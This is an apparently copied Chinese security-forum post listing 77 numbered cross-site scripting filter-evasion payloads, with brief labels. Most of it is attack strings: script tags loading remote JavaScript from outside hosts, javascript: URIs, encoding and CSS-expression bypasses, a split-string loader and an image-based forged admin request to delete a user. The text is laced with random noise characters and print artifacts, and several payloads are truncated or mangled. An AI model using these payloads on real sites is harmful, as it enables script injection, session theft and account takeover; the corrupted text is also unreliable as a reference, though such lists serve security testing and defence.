貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。4 B! M% B! x0 A1 _
(1)普通的XSS JavaScript注入1 d, K7 S1 v8 l |% Y5 \1 B5 y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 l; e' E, i8 }2 T(2)IMG标签XSS使用JavaScript命令& J. Q6 H! `" t2 q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* K& @) w- k5 D h) B! i(3)IMG标签无分号无引号6 M5 D# ?2 c2 r' ^, i; m
<IMG SRC=javascript:alert(‘XSS’)>
, ^& e: _9 h6 J, p(4)IMG标签大小写不敏感2 M+ O2 k; X/ s2 R4 A5 N9 j
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ ]( P9 g! P0 n9 T5 `( i. c/ _0 {- Y(5)HTML编码(必须有分号)
, ]. B+ \+ v( n: i0 O<IMG SRC=javascript:alert(“XSS”)>+ i* ?0 B4 k W) w- W6 v* [- A
(6)修正缺陷IMG标签
( d' l ?2 V% g<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
0 b. y: {( `3 x7 h% k+ l, i: ~2 M
$ r$ o/ F Y: ~0 l7 m$ U/ i. }. }' E( c/ S9 l
(7)formCharCode标签(计算器)
4 w& s7 p! M4 E) R' A" T8 T) B( B4 n9 E' k<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>+ s3 k" j/ y+ G5 f
(8)UTF-8的Unicode编码(计算器)
& e& K) \7 {9 h9 ?<IMG SRC=jav..省略..S')>
5 C9 r& S q0 v$ H6 E; w p(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
$ e# B P( |9 Q<IMG SRC=jav..省略..S')>
! B3 E* q. p* d(10)十六进制编码也是没有分号(计算器)
8 y8 V4 y% S& p3 l<IMG SRC=java..省略..XSS')>7 v2 w5 @; o# f" Q
(11)嵌入式标签,将Javascript分开
7 U- _5 L& c/ q5 L6 k- H- O x<IMG SRC=”jav ascript:alert(‘XSS’);”>, W% H2 v0 `) Y6 j4 Q* a
(12)嵌入式编码标签,将Javascript分开
/ L% m0 S b* X c<IMG SRC=”jav ascript:alert(‘XSS’);”>7 k% B' W* y8 h3 s9 P
(13)嵌入式换行符
; p f1 F. y; _1 f# @4 g. \9 t& n<IMG SRC=”jav ascript:alert(‘XSS’);”>
& b% Y, L! R0 \+ Y! q(14)嵌入式回车
4 D8 ~5 S. B/ r4 M# ~<IMG SRC=”jav ascript:alert(‘XSS’);”>1 m, C) f% Q( w/ V
(15)嵌入式多行注入JavaScript,这是XSS极端的例子: t* f3 ]7 N; Z
<IMG SRC=”javascript:alert(‘XSS‘)”>
) k+ o/ {5 \2 n4 b( T* ]6 \ k% A(16)解决限制字符(要求同页面)
; s* d: o4 s" q" T n<script>z=’document.’</script>
2 T7 \. ~5 i# l; c$ ~! ~% `6 Z" C<script>z=z+’write(“‘</script>
: U% P" a6 x, Q" Y% O<script>z=z+’<script’</script>
+ @1 `" z9 V" E8 \" g% J<script>z=z+’ src=ht’</script>
/ q3 X3 [1 Q) O9 D' m<script>z=z+’tp://ww’</script>
& F& ]5 L; ~! R! N" \0 B% [7 t) f<script>z=z+’w.shell’</script>
: ]; P. ^8 z% U0 F9 v; H<script>z=z+’.net/1.’</script>, t `5 `4 `4 P2 l3 {
<script>z=z+’js></sc’</script>! Z8 Q( m; a8 J' J" Q9 K
<script>z=z+’ript>”)’</script>
, T5 ~! n$ r# [<script>eval_r(z)</script>
% R L) h/ H9 S$ t(17)空字符12-7-1 T00LS - Powered by Discuz! Board
5 m( f3 @* J8 W5 j* q, f4 P/ b) Chttps://www.t00ls.net/viewthread ... table&tid=15267 2/6) k! x, k, ]6 P1 g9 N
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 x3 k4 k9 t4 X, _! R" Z
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
9 Y* f3 {/ y9 n) Bperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out% E3 q" U) U2 L) E" p( m9 K
(19)Spaces和meta前的IMG标签
( v/ U5 a$ T) B6 J: o* [ _<IMG SRC=” javascript:alert(‘XSS’);”>) \8 B9 B3 a7 q4 Q& f; a% B
(20)Non-alpha-non-digit XSS/ g$ i* M) z' t$ I/ z* X
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ ]0 V4 y% W3 f9 R2 K2 F' O- Y9 h1 i(21)Non-alpha-non-digit XSS to 2
. i" V; k/ E m8 ]- X! `* j) z: D# S4 f<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
, J! c/ F4 ?/ A! u(22)Non-alpha-non-digit XSS to 3# T7 S( c- k k: c) K; F
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) f+ m3 |) a. x! R7 V
(23)双开括号
0 y4 s0 h: q6 w' L- u/ M1 H<<SCRIPT>alert(“XSS”);//<</SCRIPT>$ ]5 \% e. v; S7 H/ p3 U5 ]2 x
(24)无结束脚本标记(仅火狐等浏览器)
% W4 h7 P) O6 J. f+ d<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
! [' j( x7 L- f(25)无结束脚本标记2
3 t7 v1 T# E: P0 }, Q<SCRIPT SRC=//3w.org/XSS/xss.js>1 K9 G( l/ I! Y/ \3 ]3 Y: S
(26)半开的HTML/JavaScript XSS
, m- Z$ K6 a ]9 A% n# C4 a<IMG SRC=”javascript:alert(‘XSS’)”9 } l! x8 m m G, `
(27)双开角括号
- T' @ e8 K$ y, R3 b/ u0 i<iframe src=http://3w.org/XSS.html <- f. O3 U6 g+ c7 U7 s$ y9 ?
(28)无单引号 双引号 分号
" @; c) W1 u7 |! Z0 F. X<SCRIPT>a=/XSS/
- r6 }5 J& O+ r, {* H balert(a.source)</SCRIPT>
4 o# I2 K6 N# e(29)换码过滤的JavaScript! k4 R; U: }# g9 r1 r6 Q* e+ P
\”;alert(‘XSS’);//
[5 I% d( l5 I; z5 f* l; j2 q(30)结束Title标签
6 E9 V: b2 Y3 W6 s</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% \/ _' L- {& b9 z# y) H* T
(31)Input Image
3 H* ~( b6 P1 u/ x7 M<INPUT SRC=”javascript:alert(‘XSS’);”>
& M( ^9 O) O2 l6 @3 a9 Y" x' J# u(32)BODY Image
/ K2 ~* h0 r6 p- Q/ D( C/ h7 }<BODY BACKGROUND=”javascript:alert(‘XSS’)”>3 m$ J0 [* i8 r6 u4 R* q( c
(33)BODY标签) j0 K' L' M4 q: O1 @+ `! R$ F
<BODY(‘XSS’)>7 d! j$ _) A7 i% }: [
(34)IMG Dynsrc8 a9 R1 k J4 o6 k! F; Q$ _
<IMG DYNSRC=”javascript:alert(‘XSS’)”>5 H( u* }) g0 E. C$ K$ B
(35)IMG Lowsrc: ^: x8 b+ c5 J3 m" B1 Y) ^
<IMG LOWSRC=”javascript:alert(‘XSS’)”>3 j! l0 I1 U6 }2 l
(36)BGSOUND
, x/ T- ?7 v: z<BGSOUND SRC=”javascript:alert(‘XSS’);”>
" Q( f1 |! D2 q0 V# G(37)STYLE sheet
/ t2 A1 G- o* K' m" w<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>: |$ U- }0 C& ]5 x9 d
(38)远程样式表4 `/ i0 Z# P$ w* s( D; {
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: v9 p1 |1 T( \1 r' p* U5 y# v(39)List-style-image(列表式) Q4 e% y( K9 V2 z+ ]. s: x( Q# E
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS' L/ @8 J0 g: j- e* z
(40)IMG VBscript
# f/ f O) _, u0 V( q4 s* H V5 {<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
9 L/ ~6 r& u& N(41)META链接url+ R6 W7 C1 _5 s2 z. H$ T
, O. n4 ^7 { S6 j
: M3 e, J1 ]. G2 r<META HTTP-EQUIV=”refresh” CONTENT=”0;
! Z' e' N- t+ ^/ g# {& Z4 `URL=http://;URL=javascript:alert(‘XSS’);”>% g6 ?3 i! ~& l# ?) u& N# ?
(42)Iframe
Q6 k4 R. }$ H/ b P$ p<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 N9 R7 ?# V& Q4 T1 p \, E/ V(43)Frame
2 }; v6 {1 t& z/ L<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board4 F( `# ?0 F; @/ G$ y/ S. w* i
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
/ `* k$ @+ I& v+ M7 {; I8 q5 s(44)Table
* ^1 y/ v, [% P- }( m. P: D<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>; t/ {, I! ~) ~9 t/ `
(45)TD
& m) `7 C4 X% n0 m, w4 o: h<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 {% k, F$ I. v' f2 t8 h8 {(46)DIV background-image
- d, ]/ t7 {5 E* L$ b6 ^, d<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>& s* Q) {" d: U& v, B1 r
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-2 L* G; M9 \. c0 J7 {2 X
8&13&12288&65279)
n _" d8 c0 q6 ]2 B u<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 Y* G/ L. g O! E5 l7 w( C# t z
(48)DIV expression/ q9 h1 o5 O+ F5 ^8 d! e8 N6 w
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
, e+ H C9 k$ E5 v8 [ x0 O$ H(49)STYLE属性分拆表达
) {6 F) H+ o4 U8 w<IMG STYLE=”xss:expression_r(alert(‘XSS’))”> d5 K& c! Z M/ W% E# k
(50)匿名STYLE(组成:开角号和一个字母开头)
# W& h2 V# V# W& n0 W<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
0 e1 l. }' t% ~0 L(51)STYLE background-image
' y# U2 c0 @1 L! n. A! I& {; y<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
3 U1 j+ N$ ~6 {2 TCLASS=XSS></A>
0 Y! g: s/ J% I: a' X' R(52)IMG STYLE方式) G* x" C* F. B
exppression(alert(“XSS”))’>. b8 N' h3 s. _3 N6 v$ s; U, ?
(53)STYLE background
) m& P" D: ]- y<STYLE><STYLE* l0 H7 a4 M P4 C5 ?& [
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
9 x7 n$ o9 ]" e7 x(54)BASE
- ] t9 c( O' B. ]+ `0 m<BASE HREF=”javascript:alert(‘XSS’);//”>
2 i. a; o6 a3 r3 {! ]) w5 T! Z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" X( o* u2 Q$ |5 H4 R' [<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
5 i; a/ @7 ~8 Z* ^(56)在flash中使用ActionScrpt可以混进你XSS的代码
1 Q2 Y/ |3 Y6 g8 F5 va=”get”;) U/ W; z" ~1 K. W
b=”URL(\”";+ @$ _3 z% u& v
c=”javascript:”;
, @4 u; J; Q9 A u$ Y( gd=”alert(‘XSS’);\”)”;
1 S0 b j" y( i: c) ]# H' `; Peval_r(a+b+c+d);# F5 u4 D3 \) J# s
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% G4 I+ J% t! J" l<HTML xmlns:xss>
D- u2 s8 a5 g4 o<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>" S, T0 Q; z4 e( V: u
<xss:xss>XSS</xss:xss>6 P0 n2 ^, t- l( b4 A% p) F8 d
</HTML>
& k5 V% x7 a' e1 j(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, ]9 }. y- n* T<SCRIPT SRC=””></SCRIPT>
0 u0 U d" N( h(59)IMG嵌入式命令,可执行任意命令+ `7 Y2 D4 Z/ L( }
<IMG SRC=”http://www.XXX.com/a.php?a=b”>1 n8 _. e. [# A# e& _
(60)IMG嵌入式命令(a.jpg在同服务器)
! ^- X3 U! U' E- h" O( H5 P5 dRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser' L8 L; `- ?0 k ^" ?
(61)绕符号过滤: m# C1 v2 P, H K. ` Q* a4 P
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 y7 w. W9 S6 n0 A9 Y
(62)% L' r) }3 G# ^1 V9 `
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, @& ^( \$ B3 I* r(63)9 @# w( I4 c4 y2 h* e9 [9 S5 I
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 B* w3 U( r! B2 ^0 D
(64)& y6 ?- ~( V9 q; T8 b3 v$ n9 U" j
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>2 J3 r8 k# A7 Y" i* ~, U
(65)0 o3 M; G4 R0 I
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
: m3 K4 N/ K9 A% q# S/ ~# T(66)12-7-1 T00LS - Powered by Discuz! Board
8 _! A, P+ o2 b: V) x* x+ Ihttps://www.t00ls.net/viewthread ... table&tid=15267 4/6% X: ]( }9 f" X. b6 s
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>4 H5 R! Y8 {- u2 L% h+ S
(67) z& T2 E% N& ? c* _
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
7 B- j% I) j; H% ^- r' H</SCRIPT>
- ^# f# V% W+ \4 M: |7 m9 ?( q3 J(68)URL绕行
8 L- j$ L6 `4 a' \) U<A HREF=”http://127.0.0.1/”>XSS</A>
& r' P* R# Y/ K6 d' b! K+ d(69)URL编码6 L( j) L. S1 }: x
<A HREF=”http://3w.org”>XSS</A>
4 I" e; N J) a5 E1 |" ]2 k$ l(70)IP十进制( Q2 E& ]" H$ Q7 E: h( e
<A HREF=”http://3232235521″>XSS</A>
' i% M; Z( m4 [' K5 v% u& d(71)IP十六进制0 c( }9 u1 y( A7 }4 r4 n/ Y% u! o
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>* _- a3 j% d. H( T5 n$ _
(72)IP八进制
2 {% y- m: s" s<A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 G. r: M3 I: C9 p. i. P0 E2 E(73)混合编码
+ a) P' Z& @+ o$ n5 [0 ~0 x& Z<A HREF=”h
0 Z: J% O9 h# x- e3 xtt p://6 6.000146.0×7.147/”">XSS</A>
4 I" z6 ^1 b& _4 E8 G% O; ?(74)节省[http:]% W* ]$ V! L2 Y9 k
<A HREF=”//www.google.com/”>XSS</A>
* i1 g2 w* o1 k$ h(75)节省[www]4 s& [0 D% d: r2 Z3 q( s" A2 Y
<A HREF=”http://google.com/”>XSS</A>4 W: W1 |5 j8 w
(76)绝对点绝对DNS3 D5 r' G) }( K8 D0 i8 d
<A HREF=”http://www.google.com./”>XSS</A>5 b8 f& }; E3 h
(77)javascript链接+ _5 w& w/ \) z+ Y: d& F
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
$ O0 \. Z4 M. Y! ^; Q" E( L* f) C* x/ Y& i: I
原文地址:http://fuzzexp.org/u/0day/?p=14 v9 T- T" c1 h8 Q
/ J1 a$ x% _, @- s8 R$ G1 g
|